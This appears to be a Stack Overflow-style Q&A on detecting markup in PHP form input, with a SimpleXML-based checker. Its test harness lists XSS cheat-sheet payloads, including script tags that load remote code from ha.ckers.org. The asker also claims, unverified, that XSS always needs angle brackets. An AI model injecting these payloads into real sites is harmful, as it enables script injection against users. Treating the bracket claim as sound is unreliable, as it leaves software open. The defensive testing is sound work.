What is the correct way to detect whether string inputs contain HTML or not?


Question

    When receiving user input from forms, I want to detect whether fields like "username" or "address" are free of markup that has a special meaning in XML (RSS feeds) or (X)HTML (when displayed).

    So which of these is the correct way to detect whether the input contains no characters that are special in an HTML or XML context?

    if (mb_strpos($data, '<') === FALSE AND mb_strpos($data, '>') === FALSE)
    

    or

    if (htmlspecialchars($data, ENT_NOQUOTES, 'UTF-8') === $data)
    

    or

    if (preg_match("/[^\p{L}\-.']/u", $data)) // problem: also catches symbols
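    To compare the three candidate checks, here is a minimal sketch that runs each one on a few sample inputs. The helper names and sample strings are hypothetical. It uses `strpos()` instead of `mb_strpos()` so it runs without the mbstring extension; for single ASCII characters such as `<` and `>` in valid UTF-8, the `=== false` test gives the same answer, because multibyte UTF-8 sequences never contain ASCII bytes.

```php
<?php
// Hypothetical wrappers around the three checks from the question.
// Each returns true when the input is considered free of markup.

function check_angle_brackets(string $data): bool
{
    // Candidate 1: no '<' and no '>' anywhere in the input.
    return strpos($data, '<') === false && strpos($data, '>') === false;
}

function check_htmlspecialchars(string $data): bool
{
    // Candidate 2: escaping &, < and > (quotes untouched) must not change the string.
    return htmlspecialchars($data, ENT_NOQUOTES, 'UTF-8') === $data;
}

function check_letters_only(string $data): bool
{
    // Candidate 3: only letters, '-', '.' and "'" are allowed.
    // preg_match() returns 1 as soon as any other character is found.
    return preg_match("/[^\p{L}\-.']/u", $data) === 0;
}

$samples = ['Jane', "O'Brien", 'AT&T', '1 Main St.', '<b>x</b>'];
foreach ($samples as $s) {
    printf(
        "%-12s brackets=%d escape=%d letters=%d\n",
        $s,
        check_angle_brackets($s),
        check_htmlspecialchars($s),
        check_letters_only($s)
    );
}
```

    With these samples, `AT&T` passes the first check but fails the second (the `&` would become `&amp;`), and the third check rejects `1 Main St.` because digits and spaces are outside its character class, which is the "also catches symbols" problem.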
    

    Have I missed anything else, like byte sequences or other tricky ways to get markup tags around things like "javascript:"? As far as I'm aware, all XSS and CSRF attacks require < or > around the values to get the browser to execute the code (at least from Internet Explorer 6 onward). Is this correct?
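    On the byte-sequence question, one cheap precaution (sketched here as an assumption, not a complete defence) is to reject input that is not valid UTF-8 before running any other check. `preg_match()` with the `u` modifier returns `false` for a malformed UTF-8 subject, and `htmlspecialchars()` with the `'UTF-8'` charset returns an empty string for such input unless `ENT_IGNORE` or `ENT_SUBSTITUTE` is passed, so the `htmlspecialchars()` comparison already rejects non-empty malformed input. The helper name `is_valid_utf8` is hypothetical.

```php
<?php
// Hypothetical helper: true only if $data is well-formed UTF-8.
// An empty pattern with the /u modifier matches any valid UTF-8 string;
// on malformed input preg_match() returns false instead of 1.
function is_valid_utf8(string $data): bool
{
    return preg_match('//u', $data) === 1;
}

$good = "Jos\xC3\xA9";   // "José" encoded as UTF-8
$bad  = "Jos\xC3\x28";   // 0xC3 must be followed by a continuation byte, not '('

var_dump(is_valid_utf8($good));                                  // bool(true)
var_dump(is_valid_utf8($bad));                                   // bool(false)
var_dump(htmlspecialchars($bad, ENT_NOQUOTES, 'UTF-8') === '');  // bool(true)
```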

    I am not looking for something to reduce or filter input. I just want to detect character sequences that are dangerous in an XML or HTML context. (strip_tags() is horribly unsafe. As the manual says, it doesn't check for malformed HTML.)

    Update

    I think I need to clarify that a lot of people are mistaking this question for one about basic security via "escaping" or "filtering" dangerous characters. This is not that question, and most of the simple answers given wouldn't solve that problem anyway.

    Update 2: Example

    • User submits input
    • if (mb_strpos($data, '<') === FALSE AND mb_strpos($data, '>') === FALSE)
    • I save it

    Now that the data is in my application, I do two things with it: 1) display it in a format like HTML, or 2) display it inside a form element for editing.

    The first one is safe in both XML and HTML contexts:

    <h2><?php print $input; ?></h2>
    <xml><item><?php print $input; ?></item></xml>
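    One thing worth checking for the XML template: the angle-bracket test alone lets `&` through, and a bare `&` is not allowed in XML character data. The sketch below (hypothetical input; it only asks libxml whether the generated document parses and says nothing about XSS) prints such a value raw into the `<item>` template and compares it with an escaped version.

```php
<?php
// Ask libxml whether a string is a well-formed XML document,
// collecting parse errors internally instead of emitting warnings.
function is_well_formed(string $xml): bool
{
    $previous = libxml_use_internal_errors(true);
    $doc = simplexml_load_string($xml);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    return $doc !== false;
}

$input = 'AT&T';  // contains neither '<' nor '>', so it passes the angle-bracket check

$raw     = '<xml><item>' . $input . '</item></xml>';
$escaped = '<xml><item>' . htmlspecialchars($input, ENT_QUOTES, 'UTF-8') . '</item></xml>';

var_dump(is_well_formed($raw));     // bool(false): "&T" starts an unterminated entity reference
var_dump(is_well_formed($escaped)); // bool(true): "&amp;" is valid XML
```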

    The second form is more dangerous, but it should still be safe:

    <input value="<?php print htmlspecialchars($input, ENT_QUOTES, 'UTF-8');?>">
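    The `ENT_QUOTES` escaping in that template matters even for input that passed the angle-bracket check: inside a quoted attribute, a double quote on its own is enough to end the value and start a new attribute. A small sketch with a hypothetical payload that contains no `<` or `>`:

```php
<?php
$input = '" autofocus onfocus="alert(1)';  // hypothetical payload, no '<' or '>'

// Printed raw, the quote closes value="..." and injects an event handler.
$raw = '<input value="' . $input . '">';

// Escaped as in the template above, the quotes become &quot; and stay inside the value.
$escaped = '<input value="' . htmlspecialchars($input, ENT_QUOTES, 'UTF-8') . '">';

echo $raw, "\n";      // <input value="" autofocus onfocus="alert(1)">
echo $escaped, "\n";  // <input value="&quot; autofocus onfocus=&quot;alert(1)">
```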

    Update 3: Working Code

    You can download the gist I created and run the code as a text or HTML response to see what I'm talking about. This simple check passes the http://ha.ckers.org XSS Cheat Sheet, and I can't find anything that gets through it. (I'm ignoring Internet Explorer 6 and below.)

    I started another bounty to award someone who can show a problem with this approach or a weakness in its implementation.

    Update 4: Ask a DOM

    It's the DOM that we want to protect, so why not just ask it? Timur's answer led to this:

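    function not_markup($string)
    {
        // Collect libxml parse errors internally instead of emitting warnings.
        libxml_use_internal_errors(true);
        if ($xml = simplexml_load_string("<root>$string</root>"))
        {
            // No child elements under <root> means no tags were found.
            return $xml->children()->count() === 0;
        }
        // Parsing failed; an empty SimpleXMLElement (e.g. for an empty string)
        // also casts to false and ends up here. Treat both as "not safe".
        return false;
    }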
    
    if (not_markup($_POST['title'])) ...
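    To see what this check reports for a few inputs, here is a small test harness. It uses a variant that compares the parse result with `false` explicitly instead of relying on SimpleXMLElement truthiness, so it may differ from the function above on edge cases such as an empty string. It makes one property visible: `children()` counts element nodes only, so a CDATA section is not reported as markup even though it contains `<`. As I read the HTML parsing rules, in ordinary HTML content `<![CDATA[>` is a bogus comment that ends at the first `>`, so the `<img>` tag in the last test string would be parsed as a real element if the string were printed unescaped into the `<h2>` template.

```php
<?php
// Variant of not_markup() that checks the parse result with === false
// instead of relying on SimpleXMLElement truthiness.
function not_markup(string $string): bool
{
    libxml_use_internal_errors(true);
    $xml = simplexml_load_string("<root>$string</root>");
    libxml_clear_errors();
    if ($xml === false) {
        return false;  // not well-formed XML: treat as markup
    }
    // children() lists element nodes only; CDATA sections, comments and
    // processing instructions are not counted.
    return $xml->children()->count() === 0;
}

$cases = [
    'Plain title',
    '<b>bold</b>',
    'AT&T',
    '<![CDATA[><img src=x onerror=alert(1)>]]>',
];

foreach ($cases as $case) {
    printf("%-45s %s\n", $case, not_markup($case) ? 'no markup' : 'markup');
}
```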
    

    Solution

    I don't think you need to implement a huge algorithm to check whether a string contains unsafe data; filters and regular expressions do the work. But if you need a more complex check, maybe this will fit your needs:

    <?php
    $strings = array();
    $strings[] = <<<EOD
        ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
    EOD;
    $strings[] = <<<EOD
        '';!--"<XSS>=&{()}
    EOD;
    $strings[] = <<<EOD
        <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
    EOD;
    $strings[] = <<<EOD
        This is a safe text
    EOD;
    $strings[] = <<<EOD
        <IMG SRC="javascript:alert('XSS');">
    EOD;
    $strings[] = <<<EOD
        <IMG SRC=javascript:alert('XSS')>
    EOD;
    $strings[] = <<<EOD
        <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
    EOD;
    $strings[] = <<<EOD
        perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
    EOD;
    $strings[] = <<<EOD
        <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
    EOD;
    $strings[] = <<<EOD
        </TITLE><SCRIPT>alert("XSS");</SCRIPT>
    EOD;
    
    
    
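    libxml_use_internal_errors(true);
    
    // Reference structure: <root> holds exactly one child, <element>.
    $sourceXML = '<root><element>value</element></root>';
    $sourceXMLDocument = simplexml_load_string($sourceXML);
    $sourceCount = $sourceXMLDocument->children()->count();
    
    foreach( $strings as $string ){
        $unsafe = false;
        // Wrap the candidate string in the same structure and let libxml parse it.
        $XML = '<root><element>'.$string.'</element></root>';
        $XMLDocument = simplexml_load_string($XML);
        if( $XMLDocument===false ){
            // Not well-formed: unbalanced tags, unquoted attributes, a bare '&', etc.
            $unsafe = true;
        }else{
            // Unsafe if the string closed <element> and added siblings under <root>,
            $count = $XMLDocument->children()->count();
            // or if it contains well-formed tags nested inside <element>,
            // which the sibling count alone does not see.
            $nested = $XMLDocument->element->children()->count();
            if( $count!=$sourceCount || $nested>0 ){
                $unsafe = true;
            }
        }
    
        echo ($unsafe?'Unsafe':'Safe').': <pre>'.htmlspecialchars($string,ENT_QUOTES,'utf-8').'</pre><br />'."\n";
    }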
    ?>
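    For comparison, the remark that filters and regular expressions usually do the job can be sketched with PHP's `filter_var()` and `FILTER_VALIDATE_REGEXP`. The allowed-character rule below (reject `<`, `>`, `&` and ASCII control characters, accept everything else) is an assumed policy for fields like names and addresses, not something stated in the answer, and `is_plain_text()` is a hypothetical name.

```php
<?php
// Assumed policy: reject '<', '>', '&' and ASCII control characters.
// \z anchors at the very end of the string; a plain $ would also match
// just before a trailing newline and let "abc\n" through.
const PLAIN_TEXT_PATTERN = '/^[^<>&\x00-\x1F\x7F]*\z/u';

function is_plain_text(string $data): bool
{
    // FILTER_VALIDATE_REGEXP returns the input on a match and false otherwise.
    $result = filter_var($data, FILTER_VALIDATE_REGEXP, [
        'options' => ['regexp' => PLAIN_TEXT_PATTERN],
    ]);
    return $result !== false;
}

foreach (['Jane Doe', "O'Brien", 'AT&T', '<b>x</b>', "line\nbreak"] as $value) {
    printf("%-14s %s\n", json_encode($value), is_plain_text($value) ? 'accepted' : 'rejected');
}
```

    Unlike the XML-parsing approach, a whitelist of this kind does not depend on how a parser treats CDATA, comments or namespaces, at the cost of rejecting some legitimate input such as company names containing `&`.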
    
